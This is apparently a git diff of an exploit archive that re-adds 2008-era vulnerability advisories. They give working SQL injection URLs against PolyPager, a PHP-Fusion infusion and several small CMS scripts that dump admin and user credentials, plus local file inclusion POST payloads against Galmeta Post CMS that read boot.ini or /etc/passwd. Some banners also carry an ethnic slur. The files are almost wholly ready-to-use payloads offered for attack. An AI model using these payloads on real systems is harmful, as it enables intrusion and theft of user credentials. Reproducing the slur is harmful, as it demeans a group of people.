-# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  #
-##################################################################
-
-# milw0rm.com [2008-06-26]
+=================================================================
+  PolyPager <= 1.0rc2 (SQL/XSS) Multiple Remote Vulnerabilities
+=================================================================
+
+  ,--^----------,--------,-----,-------^--,
+  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
+  `+---------------------------^----------|
+    `\_,-------, _________________________|
+      / XXXXXX /`|     /
+     / XXXXXX /  `\   /
+    / XXXXXX /\______(
+   / XXXXXX /           
+  / XXXXXX /
+ (________(             
+  `------'
+
+
+AUTHOR : CWH Underground
+DATE   : 26 June 2008
+SITE   : cwh.citec.us
+
+
+#####################################################
+ APPLICATION : PolyPager
+ VERSION     : <= 1.0rc2
+ VENDOR      : http://polypager.nicolashoening.de/
+ DOWNLOAD    : http://downloads.sourceforge.net/polypager
+#####################################################
+
+--- Remote SQL Injection (nr) ---
+
+---------
+ Exploit
+---------
+
+[+] http://[Target]/[polypager_path]/?[Web Page]&nr=[SQL Injection]
+
+This exploit can dump username and password in clear text
+
+-------------
+ POC Exploit
+-------------
+
+[+] http://192.168.24.25/polypager/?Test&nr=-999/**/UNION/**/SELECT/**/1,2,3,4,admin_name,admin_pass,7,8,9,10/**/FROM/**/_sys_sys--
+
+
+--- Remote XSS ---
+
+---------
+ Exploit
+---------
+
+[+] http://[Target]/polypager/?[Web Page]&nr=[XSS]
+
+##################################################################
+# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  #
+##################################################################
+
+# milw0rm.com [2008-06-26]
diff --git a/platforms/php/webapps/5942.txt b/platforms/php/webapps/5942.txt
index 67c8951ee..375e6e361 100755
--- a/platforms/php/webapps/5942.txt
+++ b/platforms/php/webapps/5942.txt
@@ -1,41 +1,41 @@
-==========================================================
-The kroax php_fusion Remote SQL-injection.
-==========================================================
-
-##################################
-Author     :  boom3rang
-Contact   :  boomerang@knaqu-shqipe.de
-webpage  :  www.khg-crew.ws 
-##################################
-
-
---- Remote SQL Injection ---
-
-[+]Google Dork:                               inurl:"kroax.php?category" 
-
---------------
- Exploit
---------------
-
-example:
-
-www.site.com/infusions/the_kroax/kroax.php?category= [SQL]
-
-
-
-[+] username:
-www.xxx-site.com/infusions/the_kroax/kroax.php?category=-9999/**/union/**/all/**/select/**/1,user_name,3,4,5,6/**/from/**/fusion_users/**/where/**/user_id=1--&boom3rang
-
-
-[+] password: 
-www.xxx-site.com/infusions/the_kroax/kroax.php?category=-9999/**/union/**/all/**/select/**/1,user_password,3,4,5,6/**/from/**/fusion_users/**/where/**/user_id=1--&boom3rang\
-
-
-ps. To find username use first  "SQL" with table_name  user_name, and for password use second "SQL" with table_name user_password.
-
-
-
-
-==========================================================    Greetz to:  All my Albanian brothers   ==========================================================
-
-# milw0rm.com [2008-06-26]
+==========================================================
+The kroax php_fusion Remote SQL-injection.
+==========================================================
+
+##################################
+Author     :  boom3rang
+Contact   :  boomerang@knaqu-shqipe.de
+webpage  :  www.khg-crew.ws 
+##################################
+
+
+--- Remote SQL Injection ---
+
+[+]Google Dork:                               inurl:"kroax.php?category" 
+
+--------------
+ Exploit
+--------------
+
+example:
+
+www.site.com/infusions/the_kroax/kroax.php?category= [SQL]
+
+
+
+[+] username:
+www.xxx-site.com/infusions/the_kroax/kroax.php?category=-9999/**/union/**/all/**/select/**/1,user_name,3,4,5,6/**/from/**/fusion_users/**/where/**/user_id=1--&boom3rang
+
+
+[+] password: 
+www.xxx-site.com/infusions/the_kroax/kroax.php?category=-9999/**/union/**/all/**/select/**/1,user_password,3,4,5,6/**/from/**/fusion_users/**/where/**/user_id=1--&boom3rang\
+
+
+ps. To find username use first  "SQL" with table_name  user_name, and for password use second "SQL" with table_name user_password.
+
+
+
+
+==========================================================    Greetz to:  All my Albanian brothers   ==========================================================
+
+# milw0rm.com [2008-06-26]
diff --git a/platforms/php/webapps/5944.txt b/platforms/php/webapps/5944.txt
index 7bad54d81..bf6a696eb 100755
--- a/platforms/php/webapps/5944.txt
+++ b/platforms/php/webapps/5944.txt
@@ -1,75 +1,75 @@
-==================================================================
-  Galmeta Post CMS Multiple Local File Inclusion Vulnerabilities
-==================================================================
-
-  ,--^----------,--------,-----,-------^--,
-  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
-  `+---------------------------^----------|
-    `\_,-------, _________________________|
-      / XXXXXX /`|     /
-     / XXXXXX /  `\   /
-    / XXXXXX /\______(
-   / XXXXXX /           
-  / XXXXXX /
- (________(             
-  `------'
-
-
-AUTHOR : CWH Underground
-DATE   : 26 June 2008
-SITE   : cwh.citec.us
-
-
-#####################################################
- APPLICATION : Galmeta Post CMS
- VERSION     : 0.2
- VENDOR      : N/A
- DOWNLOAD    : http://downloads.sourceforge.net/galmetapost
-#####################################################
-
---- Multiple Local File Inclusion [POST Method] ---
-
-
-----------
- Exploits
-----------
-
-[+] http://[Target]/[post_blog_path]/_lib/adodb_lite/tests/test_adodb_lite.php
-
-    [-] databasetype=../../../../../../../boot.ini%00&transactions=transaction%3A&adodblite=adodblite%3A&extend=extend%3A&date=date%3A&dsn_connection=0&databasename=cwh&dbusername=cwh&dbpassword=cwh&dbhost=localhost&Submit%20Form=Submit
-    [-] databasetype=mysql&transactions=../../../../../../../boot.ini%00&adodblite=adodblite%3A&extend=extend%3A&date=date%3A&dsn_connection=0&databasename=cwh&dbusername=cwh&dbpassword=cwh&dbhost=localhost&Submit%20Form=Submit
-    [-] databasetype=mysql&transactions=transaction%3A&adodblite=../../../../../../../boot.ini%00&extend=extend%3A&date=date%3A&dsn_connection=0&databasename=cwh&dbusername=cwh&dbpassword=cwh&dbhost=localhost&Submit%20Form=Submit
-    [-] databasetype=mysql&transactions=transaction&adodblite=adodblite%3A&extend=../../../../../../../boot.ini%00&date=date%3A&dsn_connection=0&databasename=cwh&dbusername=cwh&dbpassword=cwh&dbhost=localhost&Submit%20Form=Submit
-    [-] databasetype=mysql&transactions=transaction&adodblite=adodblite%3A&extend=extend%3A&date=../../../../../../../../boot.ini%00&dsn_connection=0&databasename=cwh&dbusername=cwh&dbpassword=cwh&dbhost=localhost&Submit%20Form=Submit
-
-    This exploit will open boot.ini in system file:
-
-[boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1)
-\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect [boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)
-\WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect
-
-    You can change boot.ini to /etc/passwd%00 in linux OS, For view pass hash.
-
--------------
- POC Exploit
--------------
-
-[+] POST Method
-[+] 
-[+] POST http://192.168.24.25/post_blog/_lib/adodb_lite/tests/test_adodb_lite.php HTTP/1.0
-[+] Accept: */*
-[+] Content-Type: application/x-www-form-urlencoded
-[+] User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
-[+] Host: 192.168.24.25
-[+] Content-Length: 309
-[+] Cookie: PHPSESSID=842f465924119eaa2b0fd3664fcc3b14
-[+] Connection: Close
-[+] 
-[+] databasetype=../../../../../../../boot.ini%00&transactions=transaction%3A&adodblite=adodblite%3A&extend=extend%3A&date=date%3A&dsn_connection=0&databasename=cwh&dbusername=cwh&dbpassword=cwh&dbhost=localhost&Submit%20Form=Submit
-
-
-##################################################################
-# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  #
-##################################################################
-
-# milw0rm.com [2008-06-26]
+==================================================================
+  Galmeta Post CMS Multiple Local File Inclusion Vulnerabilities
+==================================================================
+
+  ,--^----------,--------,-----,-------^--,
+  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
+  `+---------------------------^----------|
+    `\_,-------, _________________________|
+      / XXXXXX /`|     /
+     / XXXXXX /  `\   /
+    / XXXXXX /\______(
+   / XXXXXX /           
+  / XXXXXX /
+ (________(             
+  `------'
+
+
+AUTHOR : CWH Underground
+DATE   : 26 June 2008
+SITE   : cwh.citec.us
+
+
+#####################################################
+ APPLICATION : Galmeta Post CMS
+ VERSION     : 0.2
+ VENDOR      : N/A
+ DOWNLOAD    : http://downloads.sourceforge.net/galmetapost
+#####################################################
+
+--- Multiple Local File Inclusion [POST Method] ---
+
+
+----------
+ Exploits
+----------
+
+[+] http://[Target]/[post_blog_path]/_lib/adodb_lite/tests/test_adodb_lite.php
+
+    [-] databasetype=../../../../../../../boot.ini%00&transactions=transaction%3A&adodblite=adodblite%3A&extend=extend%3A&date=date%3A&dsn_connection=0&databasename=cwh&dbusername=cwh&dbpassword=cwh&dbhost=localhost&Submit%20Form=Submit
+    [-] databasetype=mysql&transactions=../../../../../../../boot.ini%00&adodblite=adodblite%3A&extend=extend%3A&date=date%3A&dsn_connection=0&databasename=cwh&dbusername=cwh&dbpassword=cwh&dbhost=localhost&Submit%20Form=Submit
+    [-] databasetype=mysql&transactions=transaction%3A&adodblite=../../../../../../../boot.ini%00&extend=extend%3A&date=date%3A&dsn_connection=0&databasename=cwh&dbusername=cwh&dbpassword=cwh&dbhost=localhost&Submit%20Form=Submit
+    [-] databasetype=mysql&transactions=transaction&adodblite=adodblite%3A&extend=../../../../../../../boot.ini%00&date=date%3A&dsn_connection=0&databasename=cwh&dbusername=cwh&dbpassword=cwh&dbhost=localhost&Submit%20Form=Submit
+    [-] databasetype=mysql&transactions=transaction&adodblite=adodblite%3A&extend=extend%3A&date=../../../../../../../../boot.ini%00&dsn_connection=0&databasename=cwh&dbusername=cwh&dbpassword=cwh&dbhost=localhost&Submit%20Form=Submit
+
+    This exploit will open boot.ini in system file:
+
+[boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1)
+\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect [boot loader] timeout=30 default=multi(0)disk(0)rdisk(0)partition(1)
+\WINDOWS [operating systems] multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Microsoft Windows XP Professional" /noexecute=optin /fastdetect
+
+    You can change boot.ini to /etc/passwd%00 in linux OS, For view pass hash.
+
+-------------
+ POC Exploit
+-------------
+
+[+] POST Method
+[+] 
+[+] POST http://192.168.24.25/post_blog/_lib/adodb_lite/tests/test_adodb_lite.php HTTP/1.0
+[+] Accept: */*
+[+] Content-Type: application/x-www-form-urlencoded
+[+] User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
+[+] Host: 192.168.24.25
+[+] Content-Length: 309
+[+] Cookie: PHPSESSID=842f465924119eaa2b0fd3664fcc3b14
+[+] Connection: Close
+[+] 
+[+] databasetype=../../../../../../../boot.ini%00&transactions=transaction%3A&adodblite=adodblite%3A&extend=extend%3A&date=date%3A&dsn_connection=0&databasename=cwh&dbusername=cwh&dbpassword=cwh&dbhost=localhost&Submit%20Form=Submit
+
+
+##################################################################
+# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  #
+##################################################################
+
+# milw0rm.com [2008-06-26]
diff --git a/platforms/php/webapps/5946.txt b/platforms/php/webapps/5946.txt
index 2dba303fb..b78a56bdc 100755
--- a/platforms/php/webapps/5946.txt
+++ b/platforms/php/webapps/5946.txt
@@ -1,68 +1,68 @@
-                          ||          ||   | ||        
-                   o_,_7 _||  . _o_7 _|| 4_|_||  o_w_, 
-                  ( :   /    (_)    /           (   .  
-|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
-|     _                   __           __       __          ______     |
-|   /' \            __  /'__`\        /\ \__  /'__`\       /\  ___\    |
-|  /\_, \    ___   /\_\/\_\L\ \    ___\ \ ,_\/\ \/\ \  _ __\ \ \__/    |
-|  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\ \___``\  |
-|     \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ |
-|      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\  \ \____/ |
-|       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/   \/___/  |
-|                  \ \____/ >> Kings of injection                      |
-|                   \/___/                                             |
-|                                                                      |
-|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
-
-
-<> Found by :  Cyb3r-1sT
-
-<> C0ntact  : cyb3r-1st [at] hotmail.com ..$<->$.. t3tto0 [at] yahoo.com
-                   
-<> Groups   : InjEctOr5 T3am 
-
-
-=======================================================
-+++++++++++++ R3membeR Kings of injection +++++++++++++
-=======================================================
-
-
-<<->> script    :  Riddles Website 
- 
-<<->> Demo site : www.easysitenetwork.com/sites/riddles/
-
-
-=======================================================
-++++++++++++++++ pWning israel fuckers ++++++++++++++++
-=======================================================
-
-
-<<->> D0rk    : N0-WaY
-
-<<->> Exploit :
-
-  for admin inf0 :: 
-
-   >>>> www.site.me/patch/riddle.php?riddleid=-999999+union+select+concat(login,0x3a,password),1,2,3,4,5,6+from+admin_login/*
-
-
-  for members inf0 ::
-
-   >>>> www.site.me/patch/riddle.php?riddleid=-999999+union+select+concat(login,0x3a,password),1,2,3,4,5,6+from+users/*
-
-
-=======================================================
-+++++++++++++++++++++++ Greetz ++++++++++++++++++++++++
-=======================================================
-
-
-<<->> My best freinds :: titanichacker $ arb-hawk $ denm0 $ drbaka  $ nicehacker$anaconda-ksa $ sirus $ crazy-x 
-                            
-                      :: abo-najm $ br1ght-dark $ spid3r-net $ hacker-b0y 
-
-<<->> InjEctOr5 TeaM   
-
-
-<<->> All muslims
-
-# milw0rm.com [2008-06-26]
+                          ||          ||   | ||        
+                   o_,_7 _||  . _o_7 _|| 4_|_||  o_w_, 
+                  ( :   /    (_)    /           (   .  
+|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
+|     _                   __           __       __          ______     |
+|   /' \            __  /'__`\        /\ \__  /'__`\       /\  ___\    |
+|  /\_, \    ___   /\_\/\_\L\ \    ___\ \ ,_\/\ \/\ \  _ __\ \ \__/    |
+|  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\ \___``\  |
+|     \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ |
+|      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\  \ \____/ |
+|       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/   \/___/  |
+|                  \ \____/ >> Kings of injection                      |
+|                   \/___/                                             |
+|                                                                      |
+|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
+
+
+<> Found by :  Cyb3r-1sT
+
+<> C0ntact  : cyb3r-1st [at] hotmail.com ..$<->$.. t3tto0 [at] yahoo.com
+                   
+<> Groups   : InjEctOr5 T3am 
+
+
+=======================================================
++++++++++++++ R3membeR Kings of injection +++++++++++++
+=======================================================
+
+
+<<->> script    :  Riddles Website 
+ 
+<<->> Demo site : www.easysitenetwork.com/sites/riddles/
+
+
+=======================================================
+++++++++++++++++ pWning israel fuckers ++++++++++++++++
+=======================================================
+
+
+<<->> D0rk    : N0-WaY
+
+<<->> Exploit :
+
+  for admin inf0 :: 
+
+   >>>> www.site.me/patch/riddle.php?riddleid=-999999+union+select+concat(login,0x3a,password),1,2,3,4,5,6+from+admin_login/*
+
+
+  for members inf0 ::
+
+   >>>> www.site.me/patch/riddle.php?riddleid=-999999+union+select+concat(login,0x3a,password),1,2,3,4,5,6+from+users/*
+
+
+=======================================================
++++++++++++++++++++++++ Greetz ++++++++++++++++++++++++
+=======================================================
+
+
+<<->> My best freinds :: titanichacker $ arb-hawk $ denm0 $ drbaka  $ nicehacker$anaconda-ksa $ sirus $ crazy-x 
+                            
+                      :: abo-najm $ br1ght-dark $ spid3r-net $ hacker-b0y 
+
+<<->> InjEctOr5 TeaM   
+
+
+<<->> All muslims
+
+# milw0rm.com [2008-06-26]
diff --git a/platforms/php/webapps/5947.txt b/platforms/php/webapps/5947.txt
index a13fbc415..9e295dce4 100755
--- a/platforms/php/webapps/5947.txt
+++ b/platforms/php/webapps/5947.txt
@@ -1,68 +1,68 @@
-                          ||          ||   | ||        
-                   o_,_7 _||  . _o_7 _|| 4_|_||  o_w_, 
-                  ( :   /    (_)    /           (   .  
-|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
-|     _                   __           __       __          ______     |
-|   /' \            __  /'__`\        /\ \__  /'__`\       /\  ___\    |
-|  /\_, \    ___   /\_\/\_\L\ \    ___\ \ ,_\/\ \/\ \  _ __\ \ \__/    |
-|  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\ \___``\  |
-|     \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ |
-|      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\  \ \____/ |
-|       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/   \/___/  |
-|                  \ \____/ >> Kings of injection                      |
-|                   \/___/                                             |
-|                                                                      |
-|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
-
-
-<> Found by :  Cyb3r-1sT
-
-<> C0ntact  : cyb3r-1st [at] hotmail.com ..$<->$.. t3tto0 [at] yahoo.com
-                   
-<> Groups   : InjEctOr5 T3am 
-
-
-=======================================================
-+++++++++++++ R3membeR Kings of injection +++++++++++++
-=======================================================
-
-
-<<->> script    :  Tips Website 
- 
-<<->> Demo site : www.easysitenetwork.com/sites/tips/
-
-
-=======================================================
-++++++++++++++++ pWning israel fuckers ++++++++++++++++
-=======================================================
-
-
-<<->> D0rk    : N0-WaY
-
-<<->> Exploit :
-
-  for admin inf0 :: 
-
-   >>>> www.site.me/patch/tip.php?tipid=90+union+select+concat(login,0x3a,password),1,2,3,4,5+from+admin_login/*
-
-
-  for members inf0 ::
-
-   >>>> www.site.me/patch/tip.php?tipid=90+union+select+concat(login,0x3a,password),1,2,3,4,5+from+users/*
-
-
-=======================================================
-+++++++++++++++++++++++ Greetz ++++++++++++++++++++++++
-=======================================================
-
-
-<<->> My best freinds :: titanichacker $ arb-hawk $ denm0 $ drbaka $ nicehacker $ anaconda-ksa $ sirus $ crazy-x 
-                           
-                      :: abo-najm $ br1ght-dark $ spid3r-net $ hacker-b0y 
-
-<<->> InjEctOr5 TeaM   
-
-
-<<->> All muslims
-
-# milw0rm.com [2008-06-26]
+                          ||          ||   | ||        
+                   o_,_7 _||  . _o_7 _|| 4_|_||  o_w_, 
+                  ( :   /    (_)    /           (   .  
+|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
+|     _                   __           __       __          ______     |
+|   /' \            __  /'__`\        /\ \__  /'__`\       /\  ___\    |
+|  /\_, \    ___   /\_\/\_\L\ \    ___\ \ ,_\/\ \/\ \  _ __\ \ \__/    |
+|  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\ \___``\  |
+|     \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ |
+|      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\  \ \____/ |
+|       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/   \/___/  |
+|                  \ \____/ >> Kings of injection                      |
+|                   \/___/                                             |
+|                                                                      |
+|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
+
+
+<> Found by :  Cyb3r-1sT
+
+<> C0ntact  : cyb3r-1st [at] hotmail.com ..$<->$.. t3tto0 [at] yahoo.com
+                   
+<> Groups   : InjEctOr5 T3am 
+
+
+=======================================================
++++++++++++++ R3membeR Kings of injection +++++++++++++
+=======================================================
+
+
+<<->> script    :  Tips Website 
+ 
+<<->> Demo site : www.easysitenetwork.com/sites/tips/
+
+
+=======================================================
+++++++++++++++++ pWning israel fuckers ++++++++++++++++
+=======================================================
+
+
+<<->> D0rk    : N0-WaY
+
+<<->> Exploit :
+
+  for admin inf0 :: 
+
+   >>>> www.site.me/patch/tip.php?tipid=90+union+select+concat(login,0x3a,password),1,2,3,4,5+from+admin_login/*
+
+
+  for members inf0 ::
+
+   >>>> www.site.me/patch/tip.php?tipid=90+union+select+concat(login,0x3a,password),1,2,3,4,5+from+users/*
+
+
+=======================================================
++++++++++++++++++++++++ Greetz ++++++++++++++++++++++++
+=======================================================
+
+
+<<->> My best freinds :: titanichacker $ arb-hawk $ denm0 $ drbaka $ nicehacker $ anaconda-ksa $ sirus $ crazy-x 
+                           
+                      :: abo-najm $ br1ght-dark $ spid3r-net $ hacker-b0y 
+
+<<->> InjEctOr5 TeaM   
+
+
+<<->> All muslims
+
+# milw0rm.com [2008-06-26]
diff --git a/platforms/php/webapps/5948.txt b/platforms/php/webapps/5948.txt
index 80662cd41..56baa237e 100755
--- a/platforms/php/webapps/5948.txt
+++ b/platforms/php/webapps/5948.txt
@@ -1,68 +1,68 @@
-                          ||          ||   | ||        
-                   o_,_7 _||  . _o_7 _|| 4_|_||  o_w_, 
-                  ( :   /    (_)    /           (   .  
-|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
-|     _                   __           __       __          ______     |
-|   /' \            __  /'__`\        /\ \__  /'__`\       /\  ___\    |
-|  /\_, \    ___   /\_\/\_\L\ \    ___\ \ ,_\/\ \/\ \  _ __\ \ \__/    |
-|  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\ \___``\  |
-|     \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ |
-|      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\  \ \____/ |
-|       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/   \/___/  |
-|                  \ \____/ >> Kings of injection                      |
-|                   \/___/                                             |
-|                                                                      |
-|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
-
-
-<> Found by :  Cyb3r-1sT
-
-<> C0ntact  : cyb3r-1st [at] hotmail.com ..$<->$.. t3tto0 [at] yahoo.com
-                   
-<> Groups   : InjEctOr5 T3am 
-
-
-=======================================================
-+++++++++++++ R3membeR Kings of injection +++++++++++++
-=======================================================
-
-
-<<->> script    :  Jokes Website 
- 
-<<->> Demo site : www.easysitenetwork.com/sites/jokes
-
-
-=======================================================
-++++++++++++++++ pWning israel fuckers ++++++++++++++++
-=======================================================
-
-
-<<->> D0rk    : N0-WaY
-
-<<->> Exploit :
-
-  for admin inf0 :: 
-
-   >>>> www.site.me/patch/joke.php?jokeid=-9999999+union+select+0,concat(login,0x3a,password),2,3,4,5,6,7+from+admin_login/*
-
-
-  for members inf0 ::
-
-   >>>> www.site.me/patch/joke.php?jokeid=-9999999+union+select+0,concat(login,0x3a,password),2,3,4,5,6,7+from+users/*
-
-
-=======================================================
-+++++++++++++++++++++++ Greetz ++++++++++++++++++++++++
-=======================================================
-
-
-<<->> My best freinds :: titanichacker $ arb-hawk $ denm0 $ drbaka $ nicehacker $ anaconda-ksa $ sirus $ crazy-x  
-                            
-                      :: abo-najm $ br1ght-dark $ spid3r-net $ hacker-b0y 
-
-<<->> InjEctOr5 TeaM   
-
-
-<<->> All muslims
-
-# milw0rm.com [2008-06-26]
+                          ||          ||   | ||        
+                   o_,_7 _||  . _o_7 _|| 4_|_||  o_w_, 
+                  ( :   /    (_)    /           (   .  
+|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
+|     _                   __           __       __          ______     |
+|   /' \            __  /'__`\        /\ \__  /'__`\       /\  ___\    |
+|  /\_, \    ___   /\_\/\_\L\ \    ___\ \ ,_\/\ \/\ \  _ __\ \ \__/    |
+|  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\ \___``\  |
+|     \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ |
+|      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\  \ \____/ |
+|       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/   \/___/  |
+|                  \ \____/ >> Kings of injection                      |
+|                   \/___/                                             |
+|                                                                      |
+|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
+
+
+<> Found by :  Cyb3r-1sT
+
+<> C0ntact  : cyb3r-1st [at] hotmail.com ..$<->$.. t3tto0 [at] yahoo.com
+                   
+<> Groups   : InjEctOr5 T3am 
+
+
+=======================================================
++++++++++++++ R3membeR Kings of injection +++++++++++++
+=======================================================
+
+
+<<->> script    :  Jokes Website 
+ 
+<<->> Demo site : www.easysitenetwork.com/sites/jokes
+
+
+=======================================================
+++++++++++++++++ pWning israel fuckers ++++++++++++++++
+=======================================================
+
+
+<<->> D0rk    : N0-WaY
+
+<<->> Exploit :
+
+  for admin inf0 :: 
+
+   >>>> www.site.me/patch/joke.php?jokeid=-9999999+union+select+0,concat(login,0x3a,password),2,3,4,5,6,7+from+admin_login/*
+
+
+  for members inf0 ::
+
+   >>>> www.site.me/patch/joke.php?jokeid=-9999999+union+select+0,concat(login,0x3a,password),2,3,4,5,6,7+from+users/*
+
+
+=======================================================
++++++++++++++++++++++++ Greetz ++++++++++++++++++++++++
+=======================================================
+
+
+<<->> My best freinds :: titanichacker $ arb-hawk $ denm0 $ drbaka $ nicehacker $ anaconda-ksa $ sirus $ crazy-x  
+                            
+                      :: abo-najm $ br1ght-dark $ spid3r-net $ hacker-b0y 
+
+<<->> InjEctOr5 TeaM   
+
+
+<<->> All muslims
+
+# milw0rm.com [2008-06-26]
diff --git a/platforms/php/webapps/5949.txt b/platforms/php/webapps/5949.txt
index e1e60cdd8..f67aad34e 100755
--- a/platforms/php/webapps/5949.txt
+++ b/platforms/php/webapps/5949.txt
@@ -1,68 +1,68 @@
-                          ||          ||   | ||        
-                   o_,_7 _||  . _o_7 _|| 4_|_||  o_w_, 
-                  ( :   /    (_)    /           (   .  
-|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
-|     _                   __           __       __          ______     |
-|   /' \            __  /'__`\        /\ \__  /'__`\       /\  ___\    |
-|  /\_, \    ___   /\_\/\_\L\ \    ___\ \ ,_\/\ \/\ \  _ __\ \ \__/    |
-|  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\ \___``\  |
-|     \ \ \/\ \/\ \ \ \ \/\ \L\ \/\ \__/\ \ \_\ \ \_\ \ \ \/ \/\ \L\ \ |
-|      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\  \ \____/ |
-|       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/   \/___/  |
-|                  \ \____/ >> Kings of injection                      |
-|                   \/___/                                             |
-|                                                                      |
-|-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=|
-
-
-<> Found by :  Cyb3r-1sT
-
-<> C0ntact  : cyb3r-1st [at] hotmail.com ..$<->$.. t3tto0 [at] yahoo.com
-                   
-<> Groups   : InjEctOr5 T3am 
-
-
-=======================================================
-+++++++++++++ R3membeR Kings of injection +++++++++++++
-=======================================================
-
-
-<<->> script    :  Drinks Website  
- 
-<<->> Demo site : www.easysitenetwork.com/sites/drinks/
-
-
-=======================================================
-++++++++++++++++ pWning israel fuckers ++++++++++++++++
-=======================================================
-
-
-<<->> D0rk    : N0-WaY
-
-<<->> Exploit :
-
-  for admin inf0 :: 
-
-   >>>> www.site.me/patch/drinks/drink.php?drinkid=-99999+union+select+0,concat(login,0x3a,password)+from+admin_login/*
-
-
-  for members inf0 ::
-
-   >>>> www.site.me/patch/drinks/drink.php?drinkid=-99999+union+select+0,concat(login,0x3a,password)+from+users/*
-
-
-=======================================================
-+++++++++++++++++++++++ Greetz ++++++++++++++++++++++++
-=======================================================
-
-
-<<->> My best freinds :: titanichacker $ arb-hawk $ denm0 $ drbaka $ nicehacker $ anaconda-ksa $ sirus $ crazy-x  
-                           
